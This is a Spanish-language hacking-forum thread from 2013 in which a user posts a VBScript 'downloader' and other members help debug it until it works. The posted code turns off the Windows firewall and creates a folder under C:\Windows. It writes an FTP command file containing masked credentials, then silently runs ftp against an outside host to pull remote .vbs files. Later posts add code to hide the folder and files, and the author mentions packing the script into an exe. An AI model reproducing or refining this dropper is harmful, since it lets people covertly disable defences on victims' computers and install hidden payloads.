elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: [AIO elhacker.NET 2013] Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  Downloader en vbs me descarga carpeta y archivo vacio
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Downloader en vbs me descarga carpeta y archivo vacio  (Leído 1,972 veces)
Instalador

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Downloader en vbs me descarga carpeta y archivo vacio
« en: 26 Enero 2013, 20:42 »

Buenas tardes, tomando las ideas de varios foreros, arme un downloader que se conecta al hosting, crea carpeta y aparecen las carpetas y archivos a descargar pero....
vacios.
Ya cambie de hosting y lo mismo pasa.
Alguien ha tenido el mismo problema? Gracias.
En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.843



Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #1 en: 26 Enero 2013, 20:57 »

Sin codigo imposible de adivinar, pero como lo has puesto en hacking basico seguro que es un downloader para malware, y tal vez se descarga si pero tu antivirus borra el archivo. Digo yo, mucho no podemos saber si no das mas datos.
En línea

Instalador

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #2 en: 26 Enero 2013, 21:07 »

Sin codigo imposible de adivinar, pero como lo has puesto en hacking basico seguro que es un downloader para malware, y tal vez se descarga si pero tu antivirus borra el archivo. Digo yo, mucho no podemos saber si no das mas datos.

Gracias por contestar, para nada es malware.

Y el codigo es este:

Set fw = CreateObject("HNetCfg.FwMgr")
Set policy = fw.LocalPolicy.CurrentProfile
policy.FirewallEnabled = FALSE

Set PV2 = CreateObject("Scripting.FileSystemObject")
PV2.createfolder "C:\Windows\diana"

Set objfso = createobject("scripting.filesystemobject")
Set archivotexto = objfso.createtextfile("C:\windows\diana\script-

ftp.dll",true)
archivotexto.writeline "ftp.xxxxx.org"
archivotexto.writeline "xxxxxxxxxxxxx"
archivotexto.writeline "xxxxxxxxxxx"
archivotexto.writeline "binary"
archivotexto.writeline "cd /public_html"
archivotexto.writeline "lcd C:\WINDOWS\diana"
archivotexto.writeline "get varios.vbs"
archivotexto.writeline "get borrar.vbs"
archivotexto.writeline "bye"
archivotexto.close

Set objfso = createobject("scripting.filesystemobject")
Set archivotexto = objfso.createtextfile

("C:\windows\diana\descarga.cmd",true)
archivotexto.writeline "@echo off"
archivotexto.writeline "ftp -s:C:\WINDOWS\diana\script-ftp.dll

ftp.260mb.org"
archivotexto.writeline "bye"
archivotexto.close

set cmd = createobject("wscript.shell")
set shell = CreateObject("Scripting.FileSystemObject")
cmd.run "C:\WINDOWS\diana\descarga.cmd", vbHide


Nota: En relacion al antivirus, lo desactive y como podras ver el firewall se desactiva al inicio del codigo.

Olvide mencionar que ya use un segundo hosting, he probado en 2 maquinas diferentes y lo mismo pasa.

Gracias por tus comentarios.
« Última modificación: 26 Enero 2013, 21:11 por Instalador » En línea

$Edu$


Desconectado Desconectado

Mensajes: 1.843



Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #3 en: 26 Enero 2013, 23:42 »

Entonces que hace este tema en Hacking Basico? xD
En línea

Instalador

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #4 en: 26 Enero 2013, 23:47 »

Entonces que hace este tema en Hacking Basico? xD



Uffffff disculpa, perdoname la vida.

Si para ti es molestia el hecho de cometer un error mil disculpas, espero no haberte ofendido ni haber afectado tus intereses, solo pido ayuda.

En realidad de ti solo he recibido recriminaciones, con todo respeto creo que con no contestar te hubiera evitado molestias.

Y el porque esta este nuevo tema aqui, sera por el mismo motivo que esta este otro aqui.

http://foro.elhacker.net/hacking_basico/manual_creando_un_downloader_en_batch_ataques_con_noip_servu_radmin21-t186544.0.html

De cualquier manera gracias. Lo mejor para ti.

« Última modificación: 26 Enero 2013, 23:54 por Instalador » En línea

skapunky
Electronik Engineer &
CoAdmin
***
Desconectado Desconectado

Mensajes: 3.638


www.killtrojan.net


Ver Perfil WWW
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #5 en: 27 Enero 2013, 01:03 »

Citar
archivotexto.writeline "ftp.xxxxx.org"
archivotexto.writeline "xxxxxxxxxxxxx"
archivotexto.writeline "xxxxxxxxxxx"

Las dos lineas de abajo refieren a usuario y contraseña del FTP? si es así es una buena manera de regalar el contenido que tenga tu cuenta, en un archivo .vbs es fácil leer el contenido.

Deberías cifrar...
En línea

Killtrojan Syslog v1.40: ENTRAR
Instalador

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #6 en: 27 Enero 2013, 01:19 »

Las dos lineas de abajo refieren a usuario y contraseña del FTP? si es así es una buena manera de regalar el contenido que tenga tu cuenta, en un archivo .vbs es fácil leer el contenido.

Deberías cifrar...

skapunky:

El archivo vbs al final se convierte a exe con el ScriptCryptor
Gracias por tus comentarios, saludos.
En línea

Crazy.sx


Desconectado Desconectado

Mensajes: 440



Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #7 en: 27 Enero 2013, 20:35 »

Hace mucho que no trabajo con estos scripts. A VBS nunca lo vi en profundidad y los scripts Batch hace años que no lo uso. Pero me puse a ver lo que había hecho y a tratar de hacer memoria para ver si te puedo ayudar.

Según estuve viendo aquí, básicamente sería, en primer lugar, un archivo que se ha llamado dfshell.dll que contiene los comandos necesarios para que FTP de Windows los use y pueda conectar y hacer lo que quieras en el servidor de FTP. Y, en segundo lugar, se ejecuta el FTP indicando que los comandos necesarios para trabajar están en ese archivo.

Siguiendo tu código, creo que te falta algo importante, el comando OPEN antes de escribir la dirección del hosting FTP:

Código
  1. Set objfso = createobject("scripting.filesystemobject")
  2. Set archivotexto = objfso.createtextfile("C:\windows\diana\script-ftp.dll",true)
  3. archivotexto.writeline "open"
  4. archivotexto.writeline "ftp.xxxxx.org"
  5. archivotexto.writeline "xxxxxxxxxxxxx"
  6. archivotexto.writeline "xxxxxxxxxxx"
  7. archivotexto.writeline "binary"
  8. archivotexto.writeline "cd /public_html"
  9. archivotexto.writeline "lcd C:\WINDOWS\diana"
  10. archivotexto.writeline "get varios.vbs"
  11. archivotexto.writeline "get borrar.vbs"
  12. archivotexto.writeline "bye"
  13. archivotexto.close

Después, en esta parte:

Código
  1. Set objfso = createobject("scripting.filesystemobject")
  2. Set archivotexto = objfso.createtextfile
  3.  
  4. ("C:\windows\diana\descarga.cmd",true)
  5. archivotexto.writeline "@echo off"
  6. archivotexto.writeline "ftp -s:C:\WINDOWS\diana\script-ftp.dll
  7.  
  8. ftp.260mb.org"
  9. archivotexto.writeline "bye"
  10. archivotexto.close

Creo que no hace falta que escribas:

Citar
ftp.260mb.org"
archivotexto.writeline "bye"

Solo bastaría conque hagas lo siguiente:

Código
  1. Set objfso = createobject("scripting.filesystemobject")
  2. Set archivotexto = objfso.createtextfile("C:\windows\diana\descarga.cmd",true)
  3. archivotexto.writeline "@echo off"
  4. archivotexto.writeline "ftp -s:C:\WINDOWS\diana\script-ftp.dll"
  5. archivotexto.writeline "exit"
  6. archivotexto.close

Y ahora sí solo debes ejecutar el script batch que creas, me refiero a descarga.cmd como lo haces en tu código.

Saludos, y espero que ésta sea la solución, si no, volvé y hacé de nuevo la consulta. Jeje.  :P
« Última modificación: 27 Enero 2013, 20:40 por Lucas.AR » En línea

Destruir K. LOL
Instalador

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #8 en: 27 Enero 2013, 20:41 »

Hace mucho que no trabajo con estos scripts. A VBS nunca lo vi en profundidad y los scripts Batch hace años que no lo uso. Pero me puse a ver lo que había hecho y a tratar de hacer memoria para ver si te puedo ayudar.

Según estuve viendo aquí, básicamente sería, en primer lugar, un archivo que se ha llamado dfshell.dll que contiene los comandos necesarios para que FTP de Windows los use y pueda conectar y hacer lo que quieras en el servidor de FTP. Y, en segundo lugar, se ejecuta el FTP indicando que los comandos necesarios para trabajar están en ese archivo.

Siguiendo tu código, creo que te falta algo importante, el comando OPEN antes de escribir la dirección del hosting FTP:

Código
  1. Set objfso = createobject("scripting.filesystemobject")
  2. Set archivotexto = objfso.createtextfile("C:\windows\diana\script-ftp.dll",true)
  3. archivotexto.writeline "open"
  4. archivotexto.writeline "ftp.xxxxx.org"
  5. archivotexto.writeline "xxxxxxxxxxxxx"
  6. archivotexto.writeline "xxxxxxxxxxx"
  7. archivotexto.writeline "binary"
  8. archivotexto.writeline "cd /public_html"
  9. archivotexto.writeline "lcd C:\WINDOWS\diana"
  10. archivotexto.writeline "get varios.vbs"
  11. archivotexto.writeline "get borrar.vbs"
  12. archivotexto.writeline "bye"
  13. archivotexto.close

Después, en esta parte:

Código
  1. Set objfso = createobject("scripting.filesystemobject")
  2. Set archivotexto = objfso.createtextfile
  3.  
  4. ("C:\windows\diana\descarga.cmd",true)
  5. archivotexto.writeline "@echo off"
  6. archivotexto.writeline "ftp -s:C:\WINDOWS\diana\script-ftp.dll
  7.  
  8. ftp.260mb.org"
  9. archivotexto.writeline "bye"
  10. archivotexto.close

Creo que no hace falta que escribas:

Solo bastaría conque hagas lo siguiente:

Código
  1. Set objfso = createobject("scripting.filesystemobject")
  2. Set archivotexto = objfso.createtextfile("C:\windows\diana\descarga.cmd",true)
  3. archivotexto.writeline "@echo off"
  4. archivotexto.writeline "ftp -s:C:\WINDOWS\diana\script-ftp.dll"
  5. archivotexto.close

Y ahora sí solo debes ejecutar el script batch que creas, me refiero a descarga.cmd como lo haces en tu código.

Saludos, y espero que ésta sea la solución, si no, volvé y hacé de nuevo la consulta. Jeje.  :P


Lucas.AR:

Gracias por contestar, hare las correcciones que mencionas y probare.
Te comento resultados en un momento, gracias.

Lucas.AR:

Ya hice las modificaciones, pero me sigue descargando los archivos vacios.
Estarias de acuerdo en que te pase los datos de conexion por privado para que veas los resultados? Bueno si tienes tiempo Gracias.

Se me ocurre que por algun motivo el hosting me tenga bloqueado, podrias probar el script en algun hosting?? Gracias.

Lucas.AR:

Solucionado, el codigo quedo asi:

Set fw = CreateObject("HNetCfg.FwMgr")
Set policy = fw.LocalPolicy.CurrentProfile
policy.FirewallEnabled = FALSE

Set PV2 = CreateObject("Scripting.FileSystemObject")
PV2.createfolder "C:\Windows\diana"

Set objfso = createobject("scripting.filesystemobject")
Set archivotexto = objfso.createtextfile("C:\windows\diana\script-ftp.dll",true)
archivotexto.writeline "open xx.xxx.xxx.xx"
archivotexto.writeline "xxxxxxxx"
archivotexto.writeline "xxxxxxx"
archivotexto.writeline "binary"
archivotexto.writeline "cd /"
archivotexto.writeline "lcd C:\WINDOWS\diana"
'archivotexto.writeline "get PRUEBA.exe"
archivotexto.writeline "get varios.vbs"
archivotexto.writeline "bye"
archivotexto.close

Set objfso = createobject("scripting.filesystemobject")
Set archivotexto = objfso.createtextfile("C:\windows\diana\descarga.cmd",true)
archivotexto.writeline "@echo off"
archivotexto.writeline "ftp -s:C:\WINDOWS\diana\script-ftp.dll"
archivotexto.close

set cmd = createobject("wscript.shell")
set shell = CreateObject("Scripting.FileSystemObject")
cmd.run "C:\WINDOWS\diana\descarga.cmd", vbHide


Aprovechando, otra molestia.
He tratado de aplicar atributos a carpetas y archivos mediante vbs pero no lo he logrado.

Trate con este codigo pero no me funciona
Set objfso = createobject("scripting.filesystemobject")

Set archivo = objfso.getfile("C:\tutorial.pdf")   'obtenemos el control sobre el archivo pdf
archivo.attributes = 34            'attributo dearchivo y oculto

Gracias por tu orientacion, saludos.


Lucas.AR:

Solucionado, para ocultar carpeta y archivo en vbs, los codigos son:

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder("C:\WINDOWS\diana")
If objFolder.Attributes = objFolder.Attributes AND 2 Then
    objFolder.Attributes = objFolder.Attributes XOR 2
End If

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("C:\WINDOWS\archivo.zip")
If objFile.Attributes = objFile.Attributes AND 2 Then
    objFile.Attributes = objFile.Attributes XOR 2
End If

Saludos
« Última modificación: 28 Enero 2013, 01:31 por Instalador » En línea

Crazy.sx


Desconectado Desconectado

Mensajes: 440



Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio
« Respuesta #9 en: 28 Enero 2013, 02:56 »

Muy bien Instalador, que bueno que pudiste resolverlo. Además me has ayudado a recordar un poco sobre los scripts. Jeje.

Saludos.
En línea

Destruir K. LOL
Instalador

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Downloader en vbs me descarga carpeta y archivo vacio Tema cerrado
« Respuesta #10 en: 28 Enero 2013, 17:14 »

Muy bien Instalador, que bueno que pudiste resolverlo. Además me has ayudado a recordar un poco sobre los scripts. Jeje.

Saludos.

Lucas.AR:

Muchas gracias por tu tiempo y por tus consejos, saludos.


Tema cerrado
« Última modificación: 28 Enero 2013, 22:35 por Instalador » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Tema de colabordador nuevo cerrado... porque?? « 1 2 3 4 »
Sugerencias y dudas sobre el Foro
Hyde 42 4,538 Último mensaje 2 Noviembre 2006, 00:22
por Hyde
Crackear un programa - tema cerrado(karmany) « 1 2 »
Ingeniería Inversa
pennismen 19 7,608 Último mensaje 6 Noviembre 2008, 08:29
por karmany
Tema no solucionado [ Cerrado ]
Programación General
Dari0s 3 1,228 Último mensaje 21 Enero 2009, 22:13
por Dari0s
especificar carpeta en la que se descarga un archivo
Programación Visual Basic
SRVAM 2 944 Último mensaje 18 Agosto 2009, 13:26
por SRVAM
Como crear Archivo EXE Vacio
Programación Visual Basic
x64Core 10 2,825 Último mensaje 26 Junio 2011, 19:25
por x64Core
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines